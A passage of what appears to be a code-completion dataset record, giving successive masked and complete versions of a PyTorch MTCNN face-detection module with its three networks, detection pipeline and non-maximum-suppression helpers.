list(batch_boxes)\n points += list(batch_points)\n result = []\n for box, point in zip(boxes, points):\n box = np.array(box)\n point = np.array(point)\n if len(box) == 0:\n result.append(None)\n else:\n result.append((box[:, :4], box[:, 4], point))\n return result\n\n\n<mask token>\n\n\nclass PNet(nn.Module):\n\n def __init__(self):\n super().__init__()\n self.conv1 = nn.Conv2d(3, 10, kernel_size=3)\n self.prelu1 = nn.PReLU(10)\n self.pool1 = nn.MaxPool2d(2, 2, ceil_mode=True)\n self.conv2 = nn.Conv2d(10, 16, kernel_size=3)\n self.prelu2 = nn.PReLU(16)\n self.conv3 = nn.Conv2d(16, 32, kernel_size=3)\n self.prelu3 = nn.PReLU(32)\n self.conv4_1 = nn.Conv2d(32, 2, kernel_size=1)\n self.softmax4_1 = nn.Softmax(dim=1)\n self.conv4_2 = nn.Conv2d(32, 4, kernel_size=1)\n\n def forward(self, x):\n x = self.conv1(x)\n x = self.prelu1(x)\n x = self.pool1(x)\n x = self.conv2(x)\n x = self.prelu2(x)\n x = self.conv3(x)\n x = self.prelu3(x)\n a = self.conv4_1(x)\n a = self.softmax4_1(a)\n b = self.conv4_2(x)\n return b, a\n\n\nclass RNet(nn.Module):\n\n def __init__(self):\n super().__init__()\n self.conv1 = nn.Conv2d(3, 28, kernel_size=3)\n self.prelu1 = nn.PReLU(28)\n self.pool1 = nn.MaxPool2d(3, 2, ceil_mode=True)\n self.conv2 = nn.Conv2d(28, 48, kernel_size=3)\n self.prelu2 = nn.PReLU(48)\n self.pool2 = nn.MaxPool2d(3, 2, ceil_mode=True)\n self.conv3 = nn.Conv2d(48, 64, kernel_size=2)\n self.prelu3 = nn.PReLU(64)\n self.dense4 = nn.Linear(576, 128)\n self.prelu4 = nn.PReLU(128)\n self.dense5_1 = nn.Linear(128, 2)\n self.softmax5_1 = nn.Softmax(dim=1)\n self.dense5_2 = nn.Linear(128, 4)\n\n def forward(self, x):\n x = self.conv1(x)\n x = self.prelu1(x)\n x = self.pool1(x)\n x = self.conv2(x)\n x = self.prelu2(x)\n x = self.pool2(x)\n x = self.conv3(x)\n x = self.prelu3(x)\n x = x.permute(0, 3, 2, 1).contiguous()\n x = self.dense4(x.view(x.shape[0], -1))\n x = self.prelu4(x)\n a = self.dense5_1(x)\n a = self.softmax5_1(a)\n b = self.dense5_2(x)\n return b, a\n\n\nclass ONet(nn.Module):\n\n def __init__(self):\n super().__init__()\n self.conv1 = nn.Conv2d(3, 32, kernel_size=3)\n self.prelu1 = nn.PReLU(32)\n self.pool1 = nn.MaxPool2d(3, 2, ceil_mode=True)\n self.conv2 = nn.Conv2d(32, 64, kernel_size=3)\n self.prelu2 = nn.PReLU(64)\n self.pool2 = nn.MaxPool2d(3, 2, ceil_mode=True)\n self.conv3 = nn.Conv2d(64, 64, kernel_size=3)\n self.prelu3 = nn.PReLU(64)\n self.pool3 = nn.MaxPool2d(2, 2, ceil_mode=True)\n self.conv4 = nn.Conv2d(64, 128, kernel_size=2)\n self.prelu4 = nn.PReLU(128)\n self.dense5 = nn.Linear(1152, 256)\n self.prelu5 = nn.PReLU(256)\n self.dense6_1 = nn.Linear(256, 2)\n self.softmax6_1 = nn.Softmax(dim=1)\n self.dense6_2 = nn.Linear(256, 4)\n self.dense6_3 = nn.Linear(256, 10)\n\n def forward(self, x):\n x = self.conv1(x)\n x = self.prelu1(x)\n x = self.pool1(x)\n x = self.conv2(x)\n x = self.prelu2(x)\n x = self.pool2(x)\n x = self.conv3(x)\n x = self.prelu3(x)\n x = self.pool3(x)\n x = self.conv4(x)\n x = self.prelu4(x)\n x = x.permute(0, 3, 2, 1).contiguous()\n x = self.dense5(x.view(x.shape[0], -1))\n x = self.prelu5(x)\n a = self.dense6_1(x)\n a = self.softmax6_1(a)\n b = self.dense6_2(x)\n c = self.dense6_3(x)\n return b, c, a\n\n\n<mask token>\n\n\ndef bbreg(boundingbox, reg):\n if reg.shape[1] == 1:\n reg = torch.reshape(reg, (reg.shape[2], reg.shape[3]))\n w = boundingbox[:, 2] - boundingbox[:, 0] + 1\n h = boundingbox[:, 3] - boundingbox[:, 1] + 1\n b1 = boundingbox[:, 0] + reg[:, 0] * w\n b2 = boundingbox[:, 1] + reg[:, 1] * h\n b3 = boundingbox[:, 2] + reg[:, 2] * w\n b4 = boundingbox[:, 3] + reg[:, 3] * h\n boundingbox[:, :4] = torch.stack([b1, b2, b3, b4]).permute(1, 0)\n return boundingbox\n\n\ndef generateBoundingBox(reg, probs, scale, thresh):\n stride = 2\n cellsize = 12\n reg = reg.permute(1, 0, 2, 3)\n mask = probs >= thresh\n mask_inds = mask.nonzero(as_tuple=False)\n image_inds = mask_inds[:, 0]\n score = probs[mask]\n reg = reg[:, mask].permute(1, 0)\n bb = mask_inds[:, 1:].type(reg.dtype).flip(1)\n q1 = ((stride * bb + 1) / scale).floor()\n q2 = ((stride * bb + cellsize - 1 + 1) / scale).floor()\n boundingbox = torch.cat([q1, q2, score.unsqueeze(1), reg], dim=1)\n return boundingbox, image_inds\n\n\ndef nms_numpy(boxes, scores, threshold, method):\n if boxes.size == 0:\n return np.empty((0, 3))\n x1 = boxes[:, 0].copy()\n y1 = boxes[:, 1].copy()\n x2 = boxes[:, 2].copy()\n y2 = boxes[:, 3].copy()\n s = scores\n area = (x2 - x1 + 1) * (y2 - y1 + 1)\n I = np.argsort(s)\n pick = np.zeros_like(s, dtype=np.int16)\n counter = 0\n while I.size > 0:\n i = I[-1]\n pick[counter] = i\n counter += 1\n idx = I[0:-1]\n xx1 = np.maximum(x1[i], x1[idx]).copy()\n yy1 = np.maximum(y1[i], y1[idx]).copy()\n xx2 = np.minimum(x2[i], x2[idx]).copy()\n yy2 = np.minimum(y2[i], y2[idx]).copy()\n w = np.maximum(0.0, xx2 - xx1 + 1).copy()\n h = np.maximum(0.0, yy2 - yy1 + 1).copy()\n inter = w * h\n if method == 'Min':\n o = inter / np.minimum(area[i], area[idx])\n else:\n o = inter / (area[i] + area[idx] - inter)\n I = I[np.where(o <= threshold)]\n pick = pick[:counter].copy()\n return pick\n\n\ndef batched_nms_numpy(boxes, scores, idxs, threshold, method):\n device = boxes.device\n if boxes.numel() == 0:\n return torch.empty((0,), dtype=torch.int64, device=device)\n max_coordinate = boxes.max()\n offsets = idxs.to(boxes) * (max_coordinate + 1)\n boxes_for_nms = boxes + offsets[:, None]\n boxes_for_nms = boxes_for_nms.cpu().numpy()\n scores = scores.cpu().numpy()\n keep = nms_numpy(boxes_for_nms, scores, threshold, method)\n return torch.as_tensor(keep, dtype=torch.long, device=device)\n\n\ndef pad(boxes, w, h):\n boxes = boxes.trunc().int().cpu().numpy()\n x = boxes[:, 0]\n y = boxes[:, 1]\n ex = boxes[:, 2]\n ey = boxes[:, 3]\n x[x < 1] = 1\n y[y < 1] = 1\n ex[ex > w] = w\n ey[ey > h] = h\n return y, ey, x, ex\n\n\n<mask token>\n\n\ndef imresample(img, sz):\n im_data = interpolate(img, size=sz, mode='area')\n return im_data\n",
"step-3": "<mask token>\n\n\nclass MTCNN:\n\n def __init__(self, device=None, model=None):\n if device is None:\n device = 'cuda' if torch.cuda.is_available() else 'cpu'\n self.device = device\n url = 'https://github.com/deepware/dFace/raw/master/models/mtcnn.pt'\n if model is None:\n model = torch.hub.load_state_dict_from_url(url)\n else:\n model = torch.load(model, map_location=device)\n self.pnet = PNet().to(device)\n self.rnet = RNet().to(device)\n self.onet = ONet().to(device)\n self.pnet.load_state_dict(model['pnet'])\n self.rnet.load_state_dict(model['rnet'])\n self.onet.load_state_dict(model['onet'])\n\n def detect(self, imgs, minsize=None):\n if len(imgs) == 0:\n return []\n if isinstance(imgs[0], np.ndarray):\n h, w = imgs[0].shape[:2]\n else:\n w, h = imgs[0].size\n if minsize is None:\n minsize = max(96 * min(w, h) / 1080, 40)\n boxes, points = [], []\n with torch.no_grad():\n batches = [imgs[i:i + 10] for i in range(0, len(imgs), 10)]\n for batch in batches:\n batch_boxes, batch_points = detect_face(batch, minsize,\n self.pnet, self.rnet, self.onet, [0.7, 0.8, 0.9], 0.709,\n self.device)\n boxes += list(batch_boxes)\n points += list(batch_points)\n result = []\n for box, point in zip(boxes, points):\n box = np.array(box)\n point = np.array(point)\n if len(box) == 0:\n result.append(None)\n else:\n result.append((box[:, :4], box[:, 4], point))\n return result\n\n\ndef empty_cache(device):\n if 'cuda' in device:\n with torch.cuda.device(device):\n torch.cuda.empty_cache()\n\n\nclass PNet(nn.Module):\n\n def __init__(self):\n super().__init__()\n self.conv1 = nn.Conv2d(3, 10, kernel_size=3)\n self.prelu1 = nn.PReLU(10)\n self.pool1 = nn.MaxPool2d(2, 2, ceil_mode=True)\n self.conv2 = nn.Conv2d(10, 16, kernel_size=3)\n self.prelu2 = nn.PReLU(16)\n self.conv3 = nn.Conv2d(16, 32, kernel_size=3)\n self.prelu3 = nn.PReLU(32)\n self.conv4_1 = nn.Conv2d(32, 2, kernel_size=1)\n self.softmax4_1 = nn.Softmax(dim=1)\n self.conv4_2 = nn.Conv2d(32, 4, kernel_size=1)\n\n def forward(self, x):\n x = self.conv1(x)\n x = self.prelu1(x)\n x = self.pool1(x)\n x = self.conv2(x)\n x = self.prelu2(x)\n x = self.conv3(x)\n x = self.prelu3(x)\n a = self.conv4_1(x)\n a = self.softmax4_1(a)\n b = self.conv4_2(x)\n return b, a\n\n\nclass RNet(nn.Module):\n\n def __init__(self):\n super().__init__()\n self.conv1 = nn.Conv2d(3, 28, kernel_size=3)\n self.prelu1 = nn.PReLU(28)\n self.pool1 = nn.MaxPool2d(3, 2, ceil_mode=True)\n self.conv2 = nn.Conv2d(28, 48, kernel_size=3)\n self.prelu2 = nn.PReLU(48)\n self.pool2 = nn.MaxPool2d(3, 2, ceil_mode=True)\n self.conv3 = nn.Conv2d(48, 64, kernel_size=2)\n self.prelu3 = nn.PReLU(64)\n self.dense4 = nn.Linear(576, 128)\n self.prelu4 = nn.PReLU(128)\n self.dense5_1 = nn.Linear(128, 2)\n self.softmax5_1 = nn.Softmax(dim=1)\n self.dense5_2 = nn.Linear(128, 4)\n\n def forward(self, x):\n x = self.conv1(x)\n x = self.prelu1(x)\n x = self.pool1(x)\n x = self.conv2(x)\n x = self.prelu2(x)\n x = self.pool2(x)\n x = self.conv3(x)\n x = self.prelu3(x)\n x = x.permute(0, 3, 2, 1).contiguous()\n x = self.dense4(x.view(x.shape[0], -1))\n x = self.prelu4(x)\n a = self.dense5_1(x)\n a = self.softmax5_1(a)\n b = self.dense5_2(x)\n return b, a\n\n\nclass ONet(nn.Module):\n\n def __init__(self):\n super().__init__()\n self.conv1 = nn.Conv2d(3, 32, kernel_size=3)\n self.prelu1 = nn.PReLU(32)\n self.pool1 = nn.MaxPool2d(3, 2, ceil_mode=True)\n self.conv2 = nn.Conv2d(32, 64, kernel_size=3)\n self.prelu2 = nn.PReLU(64)\n self.pool2 = nn.MaxPool2d(3, 2, ceil_mode=True)\n self.conv3 = nn.Conv2d(64, 64, kernel_size=3)\n self.prelu3 = nn.PReLU(64)\n self.pool3 = nn.MaxPool2d(2, 2, ceil_mode=True)\n self.conv4 = nn.Conv2d(64, 128, kernel_size=2)\n self.prelu4 = nn.PReLU(128)\n self.dense5 = nn.Linear(1152, 256)\n self.prelu5 = nn.PReLU(256)\n self.dense6_1 = nn.Linear(256, 2)\n self.softmax6_1 = nn.Softmax(dim=1)\n self.dense6_2 = nn.Linear(256, 4)\n self.dense6_3 = nn.Linear(256, 10)\n\n def forward(self, x):\n x = self.conv1(x)\n x = self.prelu1(x)\n x = self.pool1(x)\n x = self.conv2(x)\n x = self.prelu2(x)\n x = self.pool2(x)\n x = self.conv3(x)\n x = self.prelu3(x)\n x = self.pool3(x)\n x = self.conv4(x)\n x = self.prelu4(x)\n x = x.permute(0, 3, 2, 1).contiguous()\n x = self.dense5(x.view(x.shape[0], -1))\n x = self.prelu5(x)\n a = self.dense6_1(x)\n a = self.softmax6_1(a)\n b = self.dense6_2(x)\n c = self.dense6_3(x)\n return b, c, a\n\n\n<mask token>\n\n\ndef bbreg(boundingbox, reg):\n if reg.shape[1] == 1:\n reg = torch.reshape(reg, (reg.shape[2], reg.shape[3]))\n w = boundingbox[:, 2] - boundingbox[:, 0] + 1\n h = boundingbox[:, 3] - boundingbox[:, 1] + 1\n b1 = boundingbox[:, 0] + reg[:, 0] * w\n b2 = boundingbox[:, 1] + reg[:, 1] * h\n b3 = boundingbox[:, 2] + reg[:, 2] * w\n b4 = boundingbox[:, 3] + reg[:, 3] * h\n boundingbox[:, :4] = torch.stack([b1, b2, b3, b4]).permute(1, 0)\n return boundingbox\n\n\ndef generateBoundingBox(reg, probs, scale, thresh):\n stride = 2\n cellsize = 12\n reg = reg.permute(1, 0, 2, 3)\n mask = probs >= thresh\n mask_inds = mask.nonzero(as_tuple=False)\n image_inds = mask_inds[:, 0]\n score = probs[mask]\n reg = reg[:, mask].permute(1, 0)\n bb = mask_inds[:, 1:].type(reg.dtype).flip(1)\n q1 = ((stride * bb + 1) / scale).floor()\n q2 = ((stride * bb + cellsize - 1 + 1) / scale).floor()\n boundingbox = torch.cat([q1, q2, score.unsqueeze(1), reg], dim=1)\n return boundingbox, image_inds\n\n\ndef nms_numpy(boxes, scores, threshold, method):\n if boxes.size == 0:\n return np.empty((0, 3))\n x1 = boxes[:, 0].copy()\n y1 = boxes[:, 1].copy()\n x2 = boxes[:, 2].copy()\n y2 = boxes[:, 3].copy()\n s = scores\n area = (x2 - x1 + 1) * (y2 - y1 + 1)\n I = np.argsort(s)\n pick = np.zeros_like(s, dtype=np.int16)\n counter = 0\n while I.size > 0:\n i = I[-1]\n pick[counter] = i\n counter += 1\n idx = I[0:-1]\n xx1 = np.maximum(x1[i], x1[idx]).copy()\n yy1 = np.maximum(y1[i], y1[idx]).copy()\n xx2 = np.minimum(x2[i], x2[idx]).copy()\n yy2 = np.minimum(y2[i], y2[idx]).copy()\n w = np.maximum(0.0, xx2 - xx1 + 1).copy()\n h = np.maximum(0.0, yy2 - yy1 + 1).copy()\n inter = w * h\n if method == 'Min':\n o = inter / np.minimum(area[i], area[idx])\n else:\n o = inter / (area[i] + area[idx] - inter)\n I = I[np.where(o <= threshold)]\n pick = pick[:counter].copy()\n return pick\n\n\ndef batched_nms_numpy(boxes, scores, idxs, threshold, method):\n device = boxes.device\n if boxes.numel() == 0:\n return torch.empty((0,), dtype=torch.int64, device=device)\n max_coordinate = boxes.max()\n offsets = idxs.to(boxes) * (max_coordinate + 1)\n boxes_for_nms = boxes + offsets[:, None]\n boxes_for_nms = boxes_for_nms.cpu().numpy()\n scores = scores.cpu().numpy()\n keep = nms_numpy(boxes_for_nms, scores, threshold, method)\n return torch.as_tensor(keep, dtype=torch.long, device=device)\n\n\ndef pad(boxes, w, h):\n boxes = boxes.trunc().int().cpu().numpy()\n x = boxes[:, 0]\n y = boxes[:, 1]\n ex = boxes[:, 2]\n ey = boxes[:, 3]\n x[x < 1] = 1\n y[y < 1] = 1\n ex[ex > w] = w\n ey[ey > h] = h\n return y, ey, x, ex\n\n\n<mask token>\n\n\ndef imresample(img, sz):\n im_data = interpolate(img, size=sz, mode='area')\n return im_data\n",
"step-4": "<mask token>\n\n\nclass MTCNN:\n\n def __init__(self, device=None, model=None):\n if device is None:\n device = 'cuda' if torch.cuda.is_available() else 'cpu'\n self.device = device\n url = 'https://github.com/deepware/dFace/raw/master/models/mtcnn.pt'\n if model is None:\n model = torch.hub.load_state_dict_from_url(url)\n else:\n model = torch.load(model, map_location=device)\n self.pnet = PNet().to(device)\n self.rnet = RNet().to(device)\n self.onet = ONet().to(device)\n self.pnet.load_state_dict(model['pnet'])\n self.rnet.load_state_dict(model['rnet'])\n self.onet.load_state_dict(model['onet'])\n\n def detect(self, imgs, minsize=None):\n if len(imgs) == 0:\n return []\n if isinstance(imgs[0], np.ndarray):\n h, w = imgs[0].shape[:2]\n else:\n w, h = imgs[0].size\n if minsize is None:\n minsize = max(96 * min(w, h) / 1080, 40)\n boxes, points = [], []\n with torch.no_grad():\n batches = [imgs[i:i + 10] for i in range(0, len(imgs), 10)]\n for batch in batches:\n batch_boxes, batch_points = detect_face(batch, minsize,\n self.pnet, self.rnet, self.onet, [0.7, 0.8, 0.9], 0.709,\n self.device)\n boxes += list(batch_boxes)\n points += list(batch_points)\n result = []\n for box, point in zip(boxes, points):\n box = np.array(box)\n point = np.array(point)\n if len(box) == 0:\n result.append(None)\n else:\n result.append((box[:, :4], box[:, 4], point))\n return result\n\n\ndef empty_cache(device):\n if 'cuda' in device:\n with torch.cuda.device(device):\n torch.cuda.empty_cache()\n\n\nclass PNet(nn.Module):\n\n def __init__(self):\n super().__init__()\n self.conv1 = nn.Conv2d(3, 10, kernel_size=3)\n self.prelu1 = nn.PReLU(10)\n self.pool1 = nn.MaxPool2d(2, 2, ceil_mode=True)\n self.conv2 = nn.Conv2d(10, 16, kernel_size=3)\n self.prelu2 = nn.PReLU(16)\n self.conv3 = nn.Conv2d(16, 32, kernel_size=3)\n self.prelu3 = nn.PReLU(32)\n self.conv4_1 = nn.Conv2d(32, 2, kernel_size=1)\n self.softmax4_1 = nn.Softmax(dim=1)\n self.conv4_2 = nn.Conv2d(32, 4, kernel_size=1)\n\n def forward(self, x):\n x = self.conv1(x)\n x = self.prelu1(x)\n x = self.pool1(x)\n x = self.conv2(x)\n x = self.prelu2(x)\n x = self.conv3(x)\n x = self.prelu3(x)\n a = self.conv4_1(x)\n a = self.softmax4_1(a)\n b = self.conv4_2(x)\n return b, a\n\n\nclass RNet(nn.Module):\n\n def __init__(self):\n super().__init__()\n self.conv1 = nn.Conv2d(3, 28, kernel_size=3)\n self.prelu1 = nn.PReLU(28)\n self.pool1 = nn.MaxPool2d(3, 2, ceil_mode=True)\n self.conv2 = nn.Conv2d(28, 48, kernel_size=3)\n self.prelu2 = nn.PReLU(48)\n self.pool2 = nn.MaxPool2d(3, 2, ceil_mode=True)\n self.conv3 = nn.Conv2d(48, 64, kernel_size=2)\n self.prelu3 = nn.PReLU(64)\n self.dense4 = nn.Linear(576, 128)\n self.prelu4 = nn.PReLU(128)\n self.dense5_1 = nn.Linear(128, 2)\n self.softmax5_1 = nn.Softmax(dim=1)\n self.dense5_2 = nn.Linear(128, 4)\n\n def forward(self, x):\n x = self.conv1(x)\n x = self.prelu1(x)\n x = self.pool1(x)\n x = self.conv2(x)\n x = self.prelu2(x)\n x = self.pool2(x)\n x = self.conv3(x)\n x = self.prelu3(x)\n x = x.permute(0, 3, 2, 1).contiguous()\n x = self.dense4(x.view(x.shape[0], -1))\n x = self.prelu4(x)\n a = self.dense5_1(x)\n a = self.softmax5_1(a)\n b = self.dense5_2(x)\n return b, a\n\n\nclass ONet(nn.Module):\n\n def __init__(self):\n super().__init__()\n self.conv1 = nn.Conv2d(3, 32, kernel_size=3)\n self.prelu1 = nn.PReLU(32)\n self.pool1 = nn.MaxPool2d(3, 2, ceil_mode=True)\n self.conv2 = nn.Conv2d(32, 64, kernel_size=3)\n self.prelu2 = nn.PReLU(64)\n self.pool2 = nn.MaxPool2d(3, 2, ceil_mode=True)\n self.conv3 = nn.Conv2d(64, 64, kernel_size=3)\n self.prelu3 = nn.PReLU(64)\n self.pool3 = nn.MaxPool2d(2, 2, ceil_mode=True)\n self.conv4 = nn.Conv2d(64, 128, kernel_size=2)\n self.prelu4 = nn.PReLU(128)\n self.dense5 = nn.Linear(1152, 256)\n self.prelu5 = nn.PReLU(256)\n self.dense6_1 = nn.Linear(256, 2)\n self.softmax6_1 = nn.Softmax(dim=1)\n self.dense6_2 = nn.Linear(256, 4)\n self.dense6_3 = nn.Linear(256, 10)\n\n def forward(self, x):\n x = self.conv1(x)\n x = self.prelu1(x)\n x = self.pool1(x)\n x = self.conv2(x)\n x = self.prelu2(x)\n x = self.pool2(x)\n x = self.conv3(x)\n x = self.prelu3(x)\n x = self.pool3(x)\n x = self.conv4(x)\n x = self.prelu4(x)\n x = x.permute(0, 3, 2, 1).contiguous()\n x = self.dense5(x.view(x.shape[0], -1))\n x = self.prelu5(x)\n a = self.dense6_1(x)\n a = self.softmax6_1(a)\n b = self.dense6_2(x)\n c = self.dense6_3(x)\n return b, c, a\n\n\ndef detect_face(imgs, minsize, pnet, rnet, onet, threshold, factor, device):\n if isinstance(imgs, (np.ndarray, torch.Tensor)):\n imgs = torch.as_tensor(imgs, device=device)\n if len(imgs.shape) == 3:\n imgs = imgs.unsqueeze(0)\n else:\n if not isinstance(imgs, (list, tuple)):\n imgs = [imgs]\n if any(img.size != imgs[0].size for img in imgs):\n raise Exception(\n 'MTCNN batch processing only compatible with equal-dimension images.'\n )\n imgs = np.stack([np.uint8(img) for img in imgs])\n imgs = torch.as_tensor(imgs, device=device)\n model_dtype = next(pnet.parameters()).dtype\n imgs = imgs.permute(0, 3, 1, 2).type(model_dtype)\n batch_size = len(imgs)\n h, w = imgs.shape[2:4]\n m = 12.0 / minsize\n minl = min(h, w)\n minl = minl * m\n scale_i = m\n scales = []\n while minl >= 12:\n scales.append(scale_i)\n scale_i = scale_i * factor\n minl = minl * factor\n boxes = []\n image_inds = []\n all_inds = []\n all_i = 0\n for scale in scales:\n im_data = imresample(imgs, (int(h * scale + 1), int(w * scale + 1)))\n im_data = (im_data - 127.5) * 0.0078125\n reg, probs = pnet(im_data)\n empty_cache(device)\n boxes_scale, image_inds_scale = generateBoundingBox(reg, probs[:, 1\n ], scale, threshold[0])\n boxes.append(boxes_scale)\n image_inds.append(image_inds_scale)\n all_inds.append(all_i + image_inds_scale)\n all_i += batch_size\n boxes = torch.cat(boxes, dim=0)\n image_inds = torch.cat(image_inds, dim=0).cpu()\n all_inds = torch.cat(all_inds, dim=0)\n pick = batched_nms(boxes[:, :4], boxes[:, 4], all_inds, 0.5)\n boxes, image_inds = boxes[pick], image_inds[pick]\n pick = batched_nms(boxes[:, :4], boxes[:, 4], image_inds, 0.7)\n boxes, image_inds = boxes[pick], image_inds[pick]\n regw = boxes[:, 2] - boxes[:, 0]\n regh = boxes[:, 3] - boxes[:, 1]\n qq1 = boxes[:, 0] + boxes[:, 5] * regw\n qq2 = boxes[:, 1] + boxes[:, 6] * regh\n qq3 = boxes[:, 2] + boxes[:, 7] * regw\n qq4 = boxes[:, 3] + boxes[:, 8] * regh\n boxes = torch.stack([qq1, qq2, qq3, qq4, boxes[:, 4]]).permute(1, 0)\n boxes = rerec(boxes)\n y, ey, x, ex = pad(boxes, w, h)\n if len(boxes) > 0:\n im_data = []\n for k in range(len(y)):\n if ey[k] > y[k] - 1 and ex[k] > x[k] - 1:\n img_k = imgs[image_inds[k], :, y[k] - 1:ey[k], x[k] - 1:ex[k]\n ].unsqueeze(0)\n im_data.append(imresample(img_k, (24, 24)))\n im_data = torch.cat(im_data, dim=0)\n im_data = (im_data - 127.5) * 0.0078125\n out = []\n for batch in im_data.split(2000):\n out += [rnet(batch)]\n z = list(zip(*out))\n out = torch.cat(z[0]), torch.cat(z[1])\n empty_cache(device)\n out0 = out[0].permute(1, 0)\n out1 = out[1].permute(1, 0)\n score = out1[1, :]\n ipass = score > threshold[1]\n boxes = torch.cat((boxes[ipass, :4], score[ipass].unsqueeze(1)), dim=1)\n image_inds = image_inds[ipass]\n mv = out0[:, ipass].permute(1, 0)\n pick = batched_nms(boxes[:, :4], boxes[:, 4], image_inds, 0.7)\n boxes, image_inds, mv = boxes[pick], image_inds[pick], mv[pick]\n boxes = bbreg(boxes, mv)\n boxes = rerec(boxes)\n points = torch.zeros(0, 5, 2, device=device)\n if len(boxes) > 0:\n y, ey, x, ex = pad(boxes, w, h)\n im_data = []\n for k in range(len(y)):\n if ey[k] > y[k] - 1 and ex[k] > x[k] - 1:\n img_k = imgs[image_inds[k], :, y[k] - 1:ey[k], x[k] - 1:ex[k]\n ].unsqueeze(0)\n im_data.append(imresample(img_k, (48, 48)))\n im_data = torch.cat(im_data, dim=0)\n im_data = (im_data - 127.5) * 0.0078125\n out = []\n for batch in im_data.split(500):\n out += [onet(batch)]\n z = list(zip(*out))\n out = torch.cat(z[0]), torch.cat(z[1]), torch.cat(z[2])\n empty_cache(device)\n out0 = out[0].permute(1, 0)\n out1 = out[1].permute(1, 0)\n out2 = out[2].permute(1, 0)\n score = out2[1, :]\n points = out1\n ipass = score > threshold[2]\n points = points[:, ipass]\n boxes = torch.cat((boxes[ipass, :4], score[ipass].unsqueeze(1)), dim=1)\n image_inds = image_inds[ipass]\n mv = out0[:, ipass].permute(1, 0)\n w_i = boxes[:, 2] - boxes[:, 0] + 1\n h_i = boxes[:, 3] - boxes[:, 1] + 1\n points_x = w_i.repeat(5, 1) * points[:5, :] + boxes[:, 0].repeat(5, 1\n ) - 1\n points_y = h_i.repeat(5, 1) * points[5:10, :] + boxes[:, 1].repeat(5, 1\n ) - 1\n points = torch.stack((points_x, points_y)).permute(2, 1, 0)\n boxes = bbreg(boxes, mv)\n pick = batched_nms_numpy(boxes[:, :4], boxes[:, 4], image_inds, 0.7,\n 'Min')\n boxes, image_inds, points = boxes[pick], image_inds[pick], points[pick]\n boxes = boxes.cpu().numpy()\n points = points.cpu().numpy()\n batch_boxes = []\n batch_points = []\n for b_i in range(batch_size):\n b_i_inds = np.where(image_inds == b_i)\n batch_boxes.append(boxes[b_i_inds].copy())\n batch_points.append(points[b_i_inds].copy())\n batch_boxes, batch_points = np.array(batch_boxes), np.array(batch_points)\n empty_cache(device)\n return batch_boxes, batch_points\n\n\ndef bbreg(boundingbox, reg):\n if reg.shape[1] == 1:\n reg = torch.reshape(reg, (reg.shape[2], reg.shape[3]))\n w = boundingbox[:, 2] - boundingbox[:, 0] + 1\n h = boundingbox[:, 3] - boundingbox[:, 1] + 1\n b1 = boundingbox[:, 0] + reg[:, 0] * w\n b2 = boundingbox[:, 1] + reg[:, 1] * h\n b3 = boundingbox[:, 2] + reg[:, 2] * w\n b4 = boundingbox[:, 3] + reg[:, 3] * h\n boundingbox[:, :4] = torch.stack([b1, b2, b3, b4]).permute(1, 0)\n return boundingbox\n\n\ndef generateBoundingBox(reg, probs, scale, thresh):\n stride = 2\n cellsize = 12\n reg = reg.permute(1, 0, 2, 3)\n mask = probs >= thresh\n mask_inds = mask.nonzero(as_tuple=False)\n image_inds = mask_inds[:, 0]\n score = probs[mask]\n reg = reg[:, mask].permute(1, 0)\n bb = mask_inds[:, 1:].type(reg.dtype).flip(1)\n q1 = ((stride * bb + 1) / scale).floor()\n q2 = ((stride * bb + cellsize - 1 + 1) / scale).floor()\n boundingbox = torch.cat([q1, q2, score.unsqueeze(1), reg], dim=1)\n return boundingbox, image_inds\n\n\ndef nms_numpy(boxes, scores, threshold, method):\n if boxes.size == 0:\n return np.empty((0, 3))\n x1 = boxes[:, 0].copy()\n y1 = boxes[:, 1].copy()\n x2 = boxes[:, 2].copy()\n y2 = boxes[:, 3].copy()\n s = scores\n area = (x2 - x1 + 1) * (y2 - y1 + 1)\n I = np.argsort(s)\n pick = np.zeros_like(s, dtype=np.int16)\n counter = 0\n while I.size > 0:\n i = I[-1]\n pick[counter] = i\n counter += 1\n idx = I[0:-1]\n xx1 = np.maximum(x1[i], x1[idx]).copy()\n yy1 = np.maximum(y1[i], y1[idx]).copy()\n xx2 = np.minimum(x2[i], x2[idx]).copy()\n yy2 = np.minimum(y2[i], y2[idx]).copy()\n w = np.maximum(0.0, xx2 - xx1 + 1).copy()\n h = np.maximum(0.0, yy2 - yy1 + 1).copy()\n inter = w * h\n if method == 'Min':\n o = inter / np.minimum(area[i], area[idx])\n else:\n o = inter / (area[i] + area[idx] - inter)\n I = I[np.where(o <= threshold)]\n pick = pick[:counter].copy()\n return pick\n\n\ndef batched_nms_numpy(boxes, scores, idxs, threshold, method):\n device = boxes.device\n if boxes.numel() == 0:\n return torch.empty((0,), dtype=torch.int64, device=device)\n max_coordinate = boxes.max()\n offsets = idxs.to(boxes) * (max_coordinate + 1)\n boxes_for_nms = boxes + offsets[:, None]\n boxes_for_nms = boxes_for_nms.cpu().numpy()\n scores = scores.cpu().numpy()\n keep = nms_numpy(boxes_for_nms, scores, threshold, method)\n return torch.as_tensor(keep, dtype=torch.long, device=device)\n\n\ndef pad(boxes, w, h):\n boxes = boxes.trunc().int().cpu().numpy()\n x = boxes[:, 0]\n y = boxes[:, 1]\n ex = boxes[:, 2]\n ey = boxes[:, 3]\n x[x < 1] = 1\n y[y < 1] = 1\n ex[ex > w] = w\n ey[ey > h] = h\n return y, ey, x, ex\n\n\ndef rerec(bboxA):\n h = bboxA[:, 3] - bboxA[:, 1]\n w = bboxA[:, 2] - bboxA[:, 0]\n l = torch.max(w, h)\n bboxA[:, 0] = bboxA[:, 0] + w * 0.5 - l * 0.5\n bboxA[:, 1] = bboxA[:, 1] + h * 0.5 - l * 0.5\n bboxA[:, 2:4] = bboxA[:, :2] + l.repeat(2, 1).permute(1, 0)\n return bboxA\n\n\ndef imresample(img, sz):\n im_data = interpolate(img, size=sz, mode='area')\n return im_data\n",
